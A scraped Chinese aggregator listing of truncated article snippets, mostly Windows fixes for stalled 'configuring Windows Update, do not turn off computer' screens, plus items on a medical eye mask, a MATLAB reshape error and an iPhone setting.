    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/27 8:32:30
  26. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  27. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  28. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  29. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  30. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  31. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  32. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  33. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  34. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  35. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  36. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  37. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  38. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  39. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  40. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  41. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  42. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  43. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  44. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  45. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57